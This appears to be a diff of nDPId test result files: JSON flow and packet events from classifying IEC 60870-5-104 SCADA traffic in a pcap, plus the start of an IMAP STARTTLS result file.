00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992231267,"flow_last_seen":1219992231267,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992231267,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1568,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1219992231267,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992231267,"pkt":"ABXFGNTMABNy14eKCABFAAAwbS5AAIAGRKWsG\/htrBv4TwYgCWR6t61JAAAAAHAC\/\/8CpgAAAgQFtAEBBAI="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1219992231267,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992231267,"pkt":"ABNy14eKABXFGNTMCABFAAAwQVVAAIAGcH6sG\/hPrBv4bQlkBiDrZdPBeretSnAS\/\/9DbQAAAgQFtAEBBAI="}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1219992231267,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992231267,"pkt":"ABXFGNTMABNy14eKCABFAAAobS9AAIAGRKysG\/htrBv4TwYgCWR6t61K62XTwlAQ\/\/9wMQAAAAAAAAAA"}
00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992231267,"flow_last_seen":1219992231283,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992231283,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1568,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992393215,"flow_last_seen":1219992393215,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992393215,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1570,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1219992393215,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992393215,"pkt":"ABXFGNTMABNy14eKCABFAAAwbYNAAIAGRFCsG\/htrBv4TwYiCWRtLtqlAAAAAHAC\/\/\/i0AAAAgQFtAEBBAI="}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1219992393215,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992393215,"pkt":"ABNy14eKABXFGNTMCABFAAAwQXdAAIAGcFysG\/hPrBv4bQlkBiJI3nuobS7apnAS\/\/8eOQAAAgQFtAEBBAI="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1219992393216,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992393216,"pkt":"ABXFGNTMABNy14eKCABFAAAobYRAAIAGRFesG\/htrBv4TwYiCWRtLtqmSN57qVAQ\/\/9K\/QAAAAAAAAAA"}
00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992393215,"flow_last_seen":1219992393217,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992393217,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1570,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992486295,"flow_last_seen":1219992486295,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992486295,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1571,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1219992486295,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992486295,"pkt":"ABXFGNTMABNy14eKCABFAAAwbaNAAIAGRDCsG\/htrBv4TwYjCWQlpaXOAAAAAHAC\/\/9fMAAAAgQFtAEBBAI="}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1219992486296,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992486296,"pkt":"ABNy14eKABXFGNTMCABFAAAwQX5AAIAGcFWsG\/hPrBv4bQlkBiP13h8HJaWlz3AS\/\/9KOQAAAgQFtAEBBAI="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1219992486296,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992486296,"pkt":"ABXFGNTMABNy14eKCABFAAAobaRAAIAGRDesG\/htrBv4TwYjCWQlpaXP9d4fCFAQ\/\/92\/QAAAAAAAAAA"}
00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992486295,"flow_last_seen":1219992486297,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992486297,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1571,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":56,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1219992231267,"flow_last_seen":1219992392222,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":87,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1219992546983,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1568,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992590188,"flow_last_seen":1219992590188,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992590188,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1572,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1219992590188,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992590188,"pkt":"ABXFGNTMABNy14eKCABFAAAwbcVAAIAGRA6sG\/htrBv4TwYkCWQxVG2fAAAAAHAC\/\/+LrwAAAgQFtAEBBAI="}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1219992590188,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992590188,"pkt":"ABNy14eKABXFGNTMCABFAAAwQYVAAIAGcE6sG\/hPrBv4bQlkBiSd+ybXMVRtoHAS\/\/\/GywAAAgQFtAEBBAI="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1219992590188,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992590188,"pkt":"ABXFGNTMABNy14eKCABFAAAobcZAAIAGRBWsG\/htrBv4TwYkCWQxVG2gnfsm2FAQ\/\/\/zjwAAAAAAAAAA"}
00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992590188,"flow_last_seen":1219992590189,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992590189,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1572,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":73,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1219992393215,"flow_last_seen":1219992485282,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1219992650548,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1570,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":80,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1219992486295,"flow_last_seen":1219992589197,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1219992710502,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1571,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992782348,"flow_last_seen":1219992782348,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992782348,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1577,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1219992782348,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992782348,"pkt":"ABXFGNTMABNy14eKCABFAAAwbjdAAIAGQ5ysG\/htrBv4TwYpCWQN1WRMAAAAAHAC\/\/+4fAAAAgQFtAEBBAI="}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1219992782348,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992782348,"pkt":"ABNy14eKABXFGNTMCABFAAAwQZFAAIAGcEKsG\/hPrBv4bQlkBikE5Jl8DdVkTXAS\/\/8aCwAAAgQFtAEBBAI="}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1219992782349,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992782349,"pkt":"ABXFGNTMABNy14eKCABFAAAobjhAAIAGQ6OsG\/htrBv4TwYpCWQN1WRNBOSZfVAQ\/\/9GzwAAAAAAAAAA"}
00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992782348,"flow_last_seen":1219992782350,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992782350,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1577,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":101,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992819942,"flow_last_seen":1219992819942,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992819942,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1578,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1219992819942,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992819942,"pkt":"ABXFGNTMABNy14eKCABFAAAwbkRAAIAGQ4+sG\/htrBv4TwYqCWRBsBqPAAAAAHAC\/\/\/OXQAAAgQFtAEBBAI="}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1219992819943,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992819943,"pkt":"ABNy14eKABXFGNTMCABFAAAwQZZAAIAGcD2sG\/hPrBv4bQlkBir5wu6KQbAakHAS\/\/\/l\/gAAAgQFtAEBBAI="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1219992819943,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992819943,"pkt":"ABXFGNTMABNy14eKCABFAAAobkVAAIAGQ5asG\/htrBv4TwYqCWRBsBqQ+cLui1AQ\/\/8SwwAAAAAAAAAA"}
00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992819942,"flow_last_seen":1219992819944,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992819944,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1578,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
00560{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":107,"source":"iec60780-5-104.pcap","alias":"nDPId-test","packets-captured":107,"packets-processed":106,"total-skipped-flows":0,"total-l4-data-len":343,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":6,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":36,"global_ts_msec":1219992852463}
00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":117,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1219992590188,"flow_last_seen":1219992781349,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1219992910077,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1572,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":120,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1219992782348,"flow_last_seen":1219992818955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1219992935600,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1577,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":147,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1219992819942,"flow_last_seen":1219993055118,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1219993055118,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1578,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":117,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1219992590188,"flow_last_seen":1219992781349,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1219992910077,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1572,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":124,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1219992782348,"flow_last_seen":1219992818955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1219992961194,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1577,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":147,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1219992819942,"flow_last_seen":1219993055118,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1219993055118,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1578,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":147,"source":"iec60780-5-104.pcap","alias":"nDPId-test","packets-captured":147,"packets-processed":147,"total-skipped-flows":0,"total-l4-data-len":748,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":6,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":40,"global_ts_msec":1219993055118}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 147/147

12
test/results/imap-starttls.pcap.out
View File

@@ -1,11 +1,11 @@
00464{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"imap-starttls.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"imap-starttls.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1437584567812}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437584567812,"flow_last_seen":1437584567812,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437584567812,"l3_proto":"ip4","src_ip":"192.168.17.53","dst_ip":"212.227.17.186","src_port":49640,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1437584567812,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1437584567812,"pkt":"kFmvW2bUaKhtGGkOCABFAABAc8pAAEAGDnPAqBE11OMRusHoAI+CJObQAAAAALAC\/\/\/XTwAAAgQFtAEDAwQBAQgKKoxROgAAAAAEAgAA"}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1437584568002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437584568002,"pkt":"aKhtGGkOkFmvW2bUCABFIAA0AABAADAGkinU4xG6wKgRNQCPwehPqEW7giTm0YASPryvAAAAAgQFtAQCAwMKAAAA"}
